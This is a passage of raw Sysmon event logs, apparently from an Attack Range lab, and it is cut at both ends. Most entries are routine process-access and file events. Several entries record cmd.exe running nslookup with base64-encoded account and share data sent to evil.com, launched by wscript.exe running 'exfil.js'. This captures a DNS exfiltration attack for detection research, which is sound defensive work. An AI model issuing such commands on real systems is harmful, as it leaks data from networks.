RNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.022{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1545-000000005F02}2088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.022{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.022{2E1864BB-18F5-629A-1345-000000005F02}61407672C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-1545-000000005F02}2088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.029{2E1864BB-18F6-629A-1545-000000005F02}2088C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-1345-000000005F02}6140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllvepfyy.tmp 2>&1 10341000x8000000000000000212495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.007{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-1445-000000005F02}7964C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.007{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-1445-000000005F02}7964C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.991{2E1864BB-18F5-629A-1445-000000005F02}79641300C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-1345-000000005F02}6140C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044813Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:42.302{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\respondent-20220603103302-222MD5=1368864ED3964BDCAF310770CE48D2A5,SHA256=F4EE2B140FD43EB5772AE1FE5CF5CF61204868E3BB74D3908306C7C1A703C3E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044812Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:42.128{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A22826FCE29475439722C4137D339462,SHA256=7B8C9626432EB4E9DCCF7B8942E39337C3DD3CB051BAC25F1CC6A59037CEFFD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.972{2E1864BB-18F7-629A-5945-000000005F02}33607888C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-5A45-000000005F02}3864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.972{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.972{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.956{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.956{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.956{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5A45-000000005F02}3864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.956{2E1864BB-18F7-629A-5845-000000005F02}8016660C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-5A45-000000005F02}3864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.970{2E1864BB-18F7-629A-5A45-000000005F02}3864C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-5845-000000005F02}8016C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzexff.tmp 2>&1 10341000x8000000000000000213132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.941{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-5945-000000005F02}3360C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.941{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-5945-000000005F02}3360C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.941{2E1864BB-18F7-629A-5945-000000005F02}33607888C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-5845-000000005F02}8016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.925{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5945-000000005F02}3360C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.925{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.925{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.925{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.925{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.925{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5845-000000005F02}8016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.925{2E1864BB-18E0-629A-6742-000000005F02}39765704C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-5845-000000005F02}8016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.931{2E1864BB-18F7-629A-5845-000000005F02}8016C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzexff.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.909{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlewmc.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.894{2E1864BB-18F7-629A-5645-000000005F02}29005584C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-5745-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.894{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.894{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 